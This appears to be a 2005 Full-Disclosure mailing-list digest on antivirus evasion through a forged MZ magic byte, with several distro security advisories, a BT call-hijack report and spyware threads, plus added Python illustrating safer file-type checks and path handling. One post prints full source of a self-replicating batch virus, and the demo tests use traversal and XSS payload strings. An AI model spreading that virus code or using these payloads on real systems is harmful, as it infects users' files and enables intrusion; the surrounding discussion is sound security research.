[Full-disclosure] Re: Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability through forged magic byte
Andrey Bayora said:
> If your altered virus sample still executes correctly, you have simply
> created a new virus variant.
>
> Not exactly, please look at this virustotal.com log
> http://www.securityelf.org/updmagic.html
>
> The altered (120 bytes prepended) TXT_* variant is STILL detected by your
> product (CA), but when I change the first byte from Z to M - your product
> fails (MZ_* variant). I believe that if I PREPEND 120 bytes to a known
> virus and the virus is still detected with the SAME signature - then I DID
> NOT create a new variant. Now one more example: try to change the first
> byte Z in the TXT_* variant to any value, but not to M - this virus will
> be detected, but when you change it to M, thus creating the .EXE magic
> byte - the variant is not detected !!! My conclusion: the antivirus
> thought that the file is the executable type instead of determining the
> file type by the extension.
>
> That is my point, if you still think that your product is OK - do not do
> anything.

Thierry Zoller said:
> WJK You are effectively altering existing viruses to the
> WJK point that AV scanners do not detect them.
>
> No, he is changing a few bytes only.
>
> WJK If your altered virus sample still executes
> WJK correctly, you have simply created a new virus
> WJK variant.
>
> No, there is no variant, the virus executes EXACTLY as before. A variant
> acts differently than a precedent version, else it would be no variant.
> To your AV engine it is a variant, yes, but only because it is flawed.

Why are you guys having such a difficult time comprehending this? Read both
the general and AV-specific definitions of the word variant.

http://dictionary.reference.com/search?q=variant
http://www.symantec.com/avcenter/glossary/index.html#v
http://us.mcafee.com/VirusInfo/VIL/glossary_app.asp#v

If you take an existing virus and modify it, you have created a variant.

The AV vendors aren't going to patch their products if they don't detect
your PoC; they're just going to write a new signature or modify an existing
signature to detect your new variants. The fact that it can and will be
fixed by AV signatures instead of product patches should help you figure
out if this is a product vulnerability issue or just a new virus variant
issue.

BTW, Andrey, did you bother to use the deep scan, heuristic mode, reviewer
mode, etc. to see if any of those AV scanners picked up your new variants?
I bet you didn't.

Thierry Zoller said:
> WJK Consequently, the issue that you describe is *not* a
> WJK vulnerability issue, but rather just an example of a
> WJK new variant that has not yet been added to an AV
> WJK vendor's database of known viruses.
>
> Thank you James, this _to my knowledge_ (perhaps the guy from vmyths knows
> better) is the first time the complete failure of today's AV solutions is
> shown naked publicly, directly by a representative of an AV company. This
> statement coming from an AV vendor is simply exposing what has been known
> in the sec. community for many years.

To say that an AV scanner is a complete failure because it fails to detect
a variant you just created is inane. Each of the top 10 AV scanners detects
well over 95% of all known viruses. The AV scanners aren't perfect, but
they definitely make a BIG BIG difference wrt malware risk mitigation.

ftp://agn-www.informatik.uni-hamburg.de/pub/texts/tests/pc-av/2003-04/0xecsum.txt

Thierry Zoller said:
> The solution was to make the engines a bit smarter, i.e. analyse the
> header to determine the type and then ONLY apply the signatures/heuristics
> which apply to the type of the file (I am not speaking about the extension
> of the file here), thus speeding up the process. Changing the header just
> makes the smart engines look... well... a bit dumb in my regards.

There are two types of people in the world: those who complain about
problems, and those who find solutions to problems. Where's your superior
AV scanner?

--
x @ bos

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
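The disagreement above comes down to one engine design: gating the signature set on the two-byte magic alone. As an added example (my own constructed code, not any vendor's engine and not Andrey's samples), the block below puts that naive gate beside a check that accepts "MZ" only when the DOS header's e_lfanew really points at a "PE\0\0" signature, and otherwise falls back to scanning with every signature family; the marker strings, the 120-byte prefix and the PE skeleton are constructed stand-ins.

```python
"""Type-gated scanning with a trusted two-byte magic versus a validated
PE check. Constructed demonstration: the markers below stand in for real
signatures and nothing here is any vendor's engine."""
import struct

# Constructed signature database: each family is only meant to be applied
# to files of the matching type (the "smart engine" described in the thread).
SIGNATURES = {
    "pe": [b"CONSTRUCTED-PE-MARKER"],
    "script": [b"CONSTRUCTED-SCRIPT-MARKER"],
}


def naive_type(data: bytes) -> str:
    """Trusts the magic alone: 'MZ' at offset 0 means Windows executable."""
    return "pe" if data[:2] == b"MZ" else "script"


def validated_type(data: bytes) -> str:
    """Calls a file 'pe' only if the DOS header's e_lfanew (offset 0x3C)
    points at a 'PE\\0\\0' signature inside the file; otherwise 'unknown'."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        return "unknown"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "unknown"
    return "pe"


def scan(data: bytes, classifier):
    """Apply only the signature family for the detected type; when the type
    cannot be established, fall back to every family. Returns (type, hits)."""
    ftype = classifier(data)
    families = [ftype] if ftype in SIGNATURES else list(SIGNATURES)
    hits = [sig for fam in families for sig in SIGNATURES[fam] if sig in data]
    return ftype, hits


# Constructed samples. The script body carries the signature; the 120-byte
# prefix starts with "TZ" and becomes "MZ" when its first byte is changed,
# which is the single-byte edit the thread describes.
SCRIPT_BODY = b"@echo off\r\nrem CONSTRUCTED-SCRIPT-MARKER\r\n"
PREFIX_120 = b"TZ" + b"A" * 118
TXT_VARIANT = PREFIX_120 + SCRIPT_BODY
MZ_VARIANT = b"M" + PREFIX_120[1:] + SCRIPT_BODY

# A minimal well-formed PE skeleton: MZ header, e_lfanew = 0x40, "PE\0\0".
PE_SAMPLE = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)
             + b"PE\0\0" + b"CONSTRUCTED-PE-MARKER")


if __name__ == "__main__":
    for name, sample in (("TXT", TXT_VARIANT), ("MZ", MZ_VARIANT), ("PE", PE_SAMPLE)):
        print(name, "naive:", scan(sample, naive_type),
              "validated:", scan(sample, validated_type))
```

The naive gate classifies the MZ variant as an executable and applies no script signatures to it, while the validated check sees that e_lfanew points outside the file and scans it with everything.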
[Full-disclosure] [SECURITY] [DSA 877-1] New gnump3d packages fix several vulnerabilities
- --------------------------------------------------------------------------
Debian Security Advisory DSA 877-1                        [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
October 28th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : gnump3d
Vulnerability  : cross-site scripting, directory traversal
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2005-3122 CVE-2005-3123

Steve Kemp discovered two vulnerabilities in gnump3d, a streaming server
for MP3 and OGG files. The Common Vulnerabilities and Exposures Project
identifies the following problems:

CVE-2005-3122

    The 404 error page does not strip malicious JavaScript content from
    the resulting page, which would be executed in the victim's browser.

CVE-2005-3123

    By using specially crafted URLs it is possible to read arbitrary files
    to which the user of the streaming server has access.

The old stable distribution (woody) does not contain a gnump3d package.

For the stable distribution (sarge) these problems have been fixed in
version 2.9.3-1sarge2.

For the unstable distribution (sid) these problems have been fixed in
version 2.9.6-1.

We recommend that you upgrade your gnump3d package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2.dsc
    Size/MD5 checksum:    575 16114607fe426691518743a80a15deda
  http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3.orig.tar.gz
    Size/MD5 checksum: 616250 1a0d6a10f6ac2354e1f8c6000665f299
  http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2.diff.gz
    Size/MD5 checksum:  14298 9fbb9305ab4282b7957be8203dd6fb35

Architecture independent components:

  http://security.debian.org/pool/updates/main/g/gnump3d/gnump3d_2.9.3-1sarge2_all.deb
    Size/MD5 checksum: 603662 a94ff8504be400030a5f5fdb08987da0

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
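As an added illustration of the two fixes this advisory calls for (constructed code, not gnump3d's own; MEDIA_ROOT and the in-memory file set are assumptions), the handler below refuses request paths that try to climb out of the media root, the class of bug behind CVE-2005-3123, and HTML-escapes the path that the 404 page echoes back, the fix for CVE-2005-3122:

```python
"""Request handling for a media server with the two gnump3d issues closed:
requested paths are confined to the media root, and the 404 page escapes
what it echoes. Constructed example, not gnump3d's code."""
import html
import posixpath
from urllib.parse import unquote

MEDIA_ROOT = "/var/lib/music"                              # assumed document root
CONSTRUCTED_FILES = {"/var/lib/music/album/track01.mp3"}  # stands in for the disk


def resolve_media_path(url_path: str, root: str = MEDIA_ROOT):
    """Map a request path onto the media root; return None for anything
    that tries to leave it, including percent-encoded '..' segments."""
    decoded = unquote(url_path)             # one decoding pass, as the server does
    if "\x00" in decoded:
        return None
    segments = [s for s in decoded.replace("\\", "/").split("/")
                if s not in ("", ".")]
    if ".." in segments:
        return None                         # refuse rather than silently clamp
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    root_norm = posixpath.normpath(root)
    # Belt and braces: even a normalised path must stay under the root.
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


def not_found_page(url_path: str) -> str:
    """404 body that escapes the requested path instead of echoing it raw,
    so a <script> element in the URL renders as text."""
    safe = html.escape(url_path, quote=True)
    return ("<html><head><title>404 Not Found</title></head><body>"
            f"<h1>404 Not Found</h1><p>The file {safe} was not found.</p>"
            "</body></html>")


def handle_request(url_path: str, files=CONSTRUCTED_FILES):
    """Return (status, body) for a GET of url_path."""
    target = resolve_media_path(url_path)
    if target is None:
        return 403, "Forbidden"
    if target not in files:
        return 404, not_found_page(url_path)
    return 200, f"streaming {target}"


if __name__ == "__main__":
    for path in ("/album/track01.mp3", "/../../../etc/passwd",
                 "/album/%2e%2e/%2e%2e/etc/passwd", "/<script>alert(1)</script>"):
        print(path, "->", handle_request(path))
```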
[Full-disclosure] British Telecom remote landline hijack - NCR (No Crocodile-clips Required)
Overview
--------

British Telecom (BT) operates an automated fault detection and reporting
system that allows anyone to test any line. If the line is found to be
faulty the caller is given an option to divert all incoming calls for
that line to another number, including mobile phones. No authentication
is required and the owner of the line will be oblivious to the fact that
her calls are being hijacked.

Impact
------

An attacker who is either aware of a faulty line or in a position to
cause a fault on a line (e.g. by cutting/shorting it) is able to hijack
all incoming calls to that line without the owner's knowledge or consent.
Whilst BT will have a log of the number to which the calls have been
diverted, in these days of mobile-phone vending machines, this
information is useless.

Workaround
----------

Switch to a telephone company that has a clue. BT may work around this
problem by employing more staff rather than trying to save money by
implementing buggy, tortuous, irritating, automated systems.

Status
------

BT Engineers were notified.
[Full-disclosure] [ GLSA 200510-22 ] SELinux PAM: Local password guessing attack
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            Gentoo Linux Security Advisory
                                                            GLSA 200510-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                                http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: SELinux PAM: Local password guessing attack
      Date: October 28, 2005
      Bugs: #109485
        ID: 200510-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in the SELinux version of PAM allows a local attacker to
brute-force system passwords.

Background
==========

PAM (Pluggable Authentication Modules) is an architecture allowing the
separation of the development of privilege granting software from the
development of secure and appropriate authentication schemes. SELinux is
an operating system based on Linux which includes Mandatory Access
Control.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  sys-libs/pam         < 0.78-r3                          >= 0.78-r3

Description
===========

The SELinux patches for PAM introduce a vulnerability allowing a
password to be checked with the unix_chkpwd utility without delay or
logging. This vulnerability doesn't affect users who do not run SELinux.

Impact
======

A local attacker could exploit this vulnerability to brute-force
passwords and escalate privileges on an SELinux system.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All SELinux PAM users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=sys-libs/pam-0.78-r3"

References
==========

  [ 1 ] CVE-2005-2977
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2977

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
[Full-disclosure] [ GLSA 200510-23 ] TikiWiki: XSS vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            Gentoo Linux Security Advisory
                                                            GLSA 200510-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                                http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: TikiWiki: XSS vulnerability
      Date: October 28, 2005
      Bugs: #109858
        ID: 200510-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

TikiWiki is vulnerable to cross-site scripting attacks.

Background
==========

TikiWiki is a web-based groupware and content management system (CMS),
using PHP, ADOdb and Smarty.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  www-apps/tikiwiki    < 1.9.1.1                          >= 1.9.1.1

Description
===========

Due to improper input validation, TikiWiki can be exploited to perform
cross-site scripting attacks.

Impact
======

A remote attacker could exploit this to inject and execute malicious
script code or to steal cookie-based authentication credentials,
potentially compromising the victim's browser.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All TikiWiki users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/tikiwiki-1.9.1.1"

Note: Users with the vhosts USE flag set should manually use
webapp-config to finalize the update.

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-23.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
[Full-disclosure] [ GLSA 200510-24 ] Mantis: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            Gentoo Linux Security Advisory
                                                            GLSA 200510-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                                http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Mantis: Multiple vulnerabilities
      Date: October 28, 2005
      Bugs: #110326
        ID: 200510-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Mantis is affected by multiple vulnerabilities ranging from information
disclosure to arbitrary script execution.

Background
==========

Mantis is a web-based bugtracking system written in PHP.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  www-apps/mantisbt    < 0.19.3                           >= 0.19.3

Description
===========

Mantis contains several vulnerabilities, including:

  * a remote file inclusion vulnerability
  * an SQL injection vulnerability
  * multiple cross site scripting vulnerabilities
  * multiple information disclosure vulnerabilities

Impact
======

An attacker could exploit the remote file inclusion vulnerability to
execute arbitrary script code, and the SQL injection vulnerability to
access or modify sensitive information from the Mantis database.
Furthermore the cross-site scripting issues give an attacker the ability
to inject and execute malicious script code or to steal cookie-based
authentication credentials, potentially compromising the victim's
browser. An attacker could exploit other vulnerabilities to disclose
information.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Mantis users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/mantisbt-0.19.3"

References
==========

  [ 1 ] Mantis ChangeLog
        http://www.mantisbt.org/changelog.php

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-24.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
[Full-disclosure] [SECURITY] [DSA 878-1] New netpbm-free packages fix arbitrary code execution
- --------------------------------------------------------------------------
Debian Security Advisory DSA 878-1                        [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
October 28th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : netpbm-free
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2005-2978

A buffer overflow has been identified in the pnmtopng component of the
netpbm package, a set of graphics conversion tools. This vulnerability
could allow an attacker to execute arbitrary code as a local user by
providing a specially crafted PNM file.

The old stable distribution (woody) is not vulnerable to this problem.

For the stable distribution (sarge) this problem has been fixed in
version 10.0-8sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 10.0-10.

We recommend that you upgrade your netpbm-free packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
- --------------------------------
[Full-disclosure] Re: Microsoft AntiSpyware falling further behind
Hi,

Maybe better to call the things by their names and not to create havoc?
Let there be adware, Trojan horses, backdoors, viruses, etc.

Hullabaloo with so called spyware has brought us up to such a state that
on September 29th PC World wrote: "While adware can be a major annoyance,
spyware can be very dangerous, so we focused on the latter type of
threat." (http://www.pcworld.com/reviews/article/0,aid,122496,pg,1,00.asp).
Who can tell where exactly spyware begins and where it ends? Maybe
antivirus products should detect all dangerous and potentially dangerous
programs, leaving the choice of which objects to exclude from scanning to
users? Anti-spyware by definition are products which protect users
against something undefined. And the results are to be seen.

This is the report from an infected computer, scanned with Kaspersky
Anti-Virus:

Trojan.Win32.Qhost.dg
Backdoor.Win32.Rbot.gen
Net-Worm.Win32.Mytob.an
Net-Worm.Win32.Mytob.gen
Backdoor.Win32.Wootbot.gen
Trojan-Downloader.BAT.Ftp.ab
Backdoor.Win32.Codbot.as
AdWare.Sahat.ao
AdWare.Cydoor.a
AdWare.WinAD.aw

Only actively dangerous programs are listed. The computer was protected
by Spybot - Search & Destroy and Microsoft AntiSpyware. As I summarize
reports on infected computers every month, there are many such examples
saved up.

Best regards,
Valdis

- Original Message -
From: Quark IT - Hilton Travis [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, October 21, 2005 11:50 PM
Subject: Microsoft AntiSpyware falling further behind

Hi All,

It seems that not only does Microsoft AntiSpyware recommend that Claria's
spyware is ignored, but it also misses a significant amount of cookies
that are placed on a system - I have a VPC environment where I browse the
Internet so that anywhere I go won't affect my regular Windows
session/installation. Regularly CounterSpy is detecting cookies (such as
Cok.ad.yieldmanager, CGI-Bin, Cok.AssassinTrojan2.0 and Zedo (from
yesterday's browsing)) that Microsoft AntiSpyware simply does not know
about.

Now, this is not only disappointing, but potentially dangerous. Any
customer or end user running Microsoft AntiSpyware or CounterSpy is not
being protected from these cookies, and MSAS doesn't even detect them -
that's right, neither program's active monitoring is stopping the
installation of these cookies, but at least CounterSpy is detecting them
post-installation.

AntiSpyware is far, far from the accuracy of antivirus, especially
something like NOD32. I wonder how long it will be before a decent
AntiSpyware application is released that, like NOD32 does with viruses,
actually stops spyware *before* it is installed?

--
Regards,

Hilton Travis
Phone: +61 (0)7 3344 3889 (Brisbane, Australia)
Phone: +61 (0)419 792 394
Manager, Quark IT                      http://www.quarkit.com.au
         Quark Group                   http://quarkgroup.com.au/
Microsoft Small Business Specialists

http://www.threatcode.com/ -- it's now time to shame poor coders into
writing code that is acceptable for use on today's networks

War doesn't determine who is right. War determines who is left.

This document and any attachments are for the intended recipient only.
It may contain confidential, privileged or copyright material which must
not be disclosed or distributed.
RE: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 48
The virus scanner determined the type of the file by the header and it
failed. That's bad news. I am wondering, however, when I execute that
file, how does the OS process the file? I guess my question is, if I have
a modified version of a virus, with whatever header, if I try to execute
that file, will the virus code get executed?

Let's see, do you think this would be executed?

---
MZ%Nihilist% [EMAIL PROTECTED] off %Nihilist%set num=0 :ag %Nihilist% %Nihilist%set fn%num%= %Nihilist%set /a num+=1 %Nihilist%if %num% LSS 5 goto ag %Nihilist%set num=0 %Nihilist%for %%a in (*.bat *.cmd) do call :mr %%a %Nihilist%set num=-1 :fi %Nihilist% %Nihilist%set /a num+=1 %Nihilist%if %num% GTR 5 (goto ROF) %Nihilist%if %num% EQU 0 (set file=%fn0%) %Nihilist%if %num% EQU 1 (set file=%fn1%) %Nihilist%if %num% EQU 2 (set file=%fn2%) %Nihilist%if %num% EQU 3 (set file=%fn3%) %Nihilist%if %num% EQU 4 (set file=%fn4%) %Nihilist%if %num% EQU 5 (set file=%fn5%) %Nihilist%set rnd=%random% %Nihilist%set spth=%0 :findnum%Nihilist% %Nihilist%set /a rnd-=10 %Nihilist%if %rnd% GEQ 10 (goto findnum) %Nihilist%set lz=0 %Nihilist%del tmp %Nihilist%for /f tokens=1* %%a in (%file%) do if 1 EQU 1 ( %Nihilist% set lc=%%a %%b %Nihilist% call :wl %Nihilist%) find Nihilist %spth% tmp %Nihilist%more +%rnd% %file% tmp %Nihilist%move /y tmp %file% [EMAIL PROTECTED] on %Nihilist%goto fi :wl %Nihilist% %Nihilist%set /a lz=%lz%+1 %Nihilist%if %lz% LEQ %rnd% (echo %lc% tmp) %Nihilist%goto :EOF :mr %Nihilist% %Nihilist%if %num% LEQ 5 ( %Nihilist%set fn%num%=%1 %Nihilist%set /a num+=1 %Nihilist%) :ROF%Nihilist%
---
Re: [Full-disclosure] Re: Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability through forged magic byte
Hello x,

> The AV vendors aren't going to patch their products if they don't detect
> your PoC; they're just going to write a new signature or modify an existing
> signature to detect your new variants. The fact that it can and will be
> fixed by AV signatures instead of product patches should help you figure
> out if this is a product vulnerability issue or just a new virus variant
> issue.

Good point, so I have news for you - some AV vendors contacted me and they
WILL issue patches for their products. Is it what you need as a proof of
the existence of a bug? Please, wait a couple of weeks.

> BTW, Andrey, did you bother to use the deep scan, heuristic mode, reviewer
> mode, etc to see if any of those AV scanners picked up your new variants?

YES, that is the reason why I prefer to use my AV lab instead of
virustotal.com and others. The only exception is CA - I tested the 7.0
version that didn't have reviewer mode (or I didn't find how to enable
this).

> I bet you didn't.

Why are you guessing (betting)? I provide all the information that you need
to check this bug and not to make up conclusions based on guesses.

Best regards,
Andrey Bayora.

- Original Message -
From: x [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Friday, October 28, 2005 8:05 AM
Subject: [Full-disclosure] Re: Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability through forged magic byte
Re: [Full-disclosure] Re: Microsoft AntiSpyware falling further behind
Hi,

As today I was preparing news for a portal on IT security, I was informed
that the Anti-Spyware Coalition is finalizing a spyware definition. It is
the last moment to finalize with spyware, because on the horizon
"crimeware" has already appeared. Take a look at
http://www.antiphishing.org/. I'm quoting: "Technical subterfuge schemes
plant crimeware onto PCs to steal credentials directly, often using Trojan
keylogger spyware." Maybe it would be better to call Trojan horses Trojan
horses?

Regards,
Valdis

- Original Message -
From: Jerome Athias [EMAIL PROTECTED]
To: Valdis Shkesters [EMAIL PROTECTED]
Sent: Friday, October 28, 2005 4:22 PM
Subject: Re: [Full-disclosure] Re: Microsoft AntiSpyware falling further behind

Valdis Shkesters wrote:
> Hi,
> Maybe better to call the things their names and not to create havoc?

sure.

Maybe will be interesting for you:
http://www.theregister.co.uk/2005/10/28/anti-spyware_defs/
[Full-disclosure] Brain dead SSH scans from Italy
Well, I'm stumped. I mean, really stumped.

I've had a host scanning my network for the past three days, and it initially looked like one of the automated scans we've all become so familiar with (unfortunately). Naturally, the automatic defense was engaged, and I thought that would be the end of it. Nope. It continues to send SYN packets, and although it's dropped off in attacks to the other machines, it still pounds at the doors of two of them. Those two machines have a couple of things in common: they are both running BIND 9, and are both OpenBSD {mumble}.

I've sent email off to the RIPE contacts for the IP (195.250.227.226), and to the WHOIS contacts for the domain (ocem.com), and to [EMAIL PROTECTED] as well. Nothing.

If I take off the null routing on either of those machines, it immediately starts hammering at them, with no signs of cessation. I have considered just letting it finish, but I'm more concerned that there's a new variant on this moronic scan that doesn't know when to quit. I suspect that the continuation is because they are DNS servers, since I took the blocking off of one of the other machines also running OpenBSD, and the scanning did not resume (although I had expected it to).

I'm at a loss. If anyone knows Italian (I don't), and can contact one of:

[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]

or anyone at ocem.com, please, let them know that the machine is compromised, and that they need to take it off line, and clean it up.

TIA and all that.

--
There are two ways, my friend, that you can be rich in life. One is to make a lot of money and the other is to have few needs.
William Sloane Coffin, Letters to a Young Doubter
Re: [Full-disclosure] Re: Microsoft AntiSpyware falling further behind
On Fri, 28 Oct 2005 17:56:32 +0300, Valdis Shkesters said:

(Hmm.. usually when I reply to Valdis I'm talking to myself... ;)

+ As today I was preparing news for a portal on IT security, I was informed
+ that the Anti-Spyware Coalition is finalizing its spyware definition. It is
+ the last moment to finalize with spyware, because crimeware has already
+ appeared on the horizon. Take a look at http://www.antiphishing.org/. I'm
+ quoting: "Technical subterfuge schemes plant crimeware onto PCs to steal
+ credentials directly, often using Trojan keylogger spyware."
+
+ Maybe it would be better to call Trojan horses Trojan horses?

No, because they're different. Trojan horses (a) get installed under pretense of being something wanted or beneficial (Hey, I'm a neat fun codec that lets you view these movies...) and (b) once there, give the attacker a back door into the system, to do unspecified things (run commands, launch DDoS attacks, send spam, scan for other vulnerable software, upload plugins to extend the Trojan's functionality, or whatever).

Spyware, on the other hand (a) *may* be installed via Trojan Horse means, but may also be forcibly inserted on a system via a software vulnerability, or added in via the above-mentioned plugin method by an already-present Trojan, and (b) is software that monitors system activity (keystrokes, screen pixmaps, etc) in an effort to acquire credentials or other sensitive information.
Re: [Full-disclosure] Brain dead SSH scans from Italy
On Fri, 2005-10-28 at 08:15 -0700, Etaoin Shrdlu wrote:
+ Well, I'm stumped. I mean, really stumped.
+
+ I've had a host scanning my network for the past three days, and it
+ initially looked like one of the automated scans we've all become so
+ familiar with (unfortunately). Naturally, the automatic defense was
+ engaged, and I thought that would be the end of it. Nope.
[..snipped..]
+ I'm at a loss. If anyone knows Italian (I don't), and can contact one of:
[..snipped..]

Try this site: http://babelfish.altavista.com/babelfish/ which can translate English to Italian.

You might want to cc the abuse address for their upstream too.

Regards,
J

--
Jeff MacDonald
Zoid Technologies
GPG Fingerprint: 0831 879E B6B4 C4CC D3C9 419F B12D E3CE B927 04B2
[Full-disclosure] Re: Multiple Vendor Anti-Virus Software DetectionEvasion Vulnerability through forged magic byte
Bipin Gautam said:
+ Consequently, the issue that you describe is *not* a
+ vulnerability issue, but rather just an example of a new
+ variant that has not yet been added to an AV vendor's
+ database of known viruses.
+
+ yap, maybe* but i consider this issue equiv. to the
+ 'classic issue' of adding NOPs to the shellcode to bypass
+ IDS/IPS. You ain't gonna add every possible combination
+ as signatures!

That is true, but the key point is that you _don't have_ to add a sig for every possible combination. You only have to add a sig when somebody actually releases a functioning variant into the wild. Or, if your AV scanner uses heuristic / rules-based scanning by default, you can just write a rule to detect most/all of the combinations.

And this is exactly the way IDS/IPS works too. They don't write sigs for every theoretically possible vulnerability or threat; they just write sigs/rules for known exploits and vulnerabilities, and for theoretical issues that have a good probability of showing up in the wild.

So, the AV vendors wouldn't have to do anything unless somebody actually created a working variant of a virus based on this magic byte concept, and released it into the wild.

+ Variant huh?
+
+ My definition of variant is a bit straightforward. And it
+ sure isn't a 'universal trick' that can be used to
+ modify any malicious executable (which has a known AV
+ signature) by an 8 year old with 0 programming knowledge
+ or by using any special tools to make it un-detectable,
+ later. Admit it... AV vendors aren't going to
+ double/triple their AV definitions to detect all of such
+ possible variants. C'mon, is the execution point of ANY
+ instruction code or program flow being changed?

See above.

8 year olds? Considering the maturity of current virus creation toolkits, I have no doubt that 8 year olds with no programming skills are pointing and clicking to create new viruses.

All that said, if an AV vendor can fix this issue by easily creating patches for all of their products, then great. I'm simply stating that the issue can be effectively, and probably more easily, fixed too by creating new signatures or rules. I bet this is how most vendors will handle the issue now. Remember: the AV vendors only have to write signatures/rules if Andrey, or somebody else, actually creates a functioning variant and releases it into the wild.

Andrey Bayora said:
+ The AV vendors aren't going to patch their products if
+ they don't detect your PoC; they're just going to write a
+ new signature or modify an existing signature to detect
+ your new variants. The fact that it can and will be
+ fixed by AV signatures instead of product patches should
+ help you figure out if this is a product vulnerability
+ issue or just a new virus variant issue.
+
+ Good point, so I have news for you - some AV vendors
+ contacted me and they WILL issue patches for their
+ products. Is it what you need as a proof of existence of
+ a bug? Please, wait a couple of weeks.

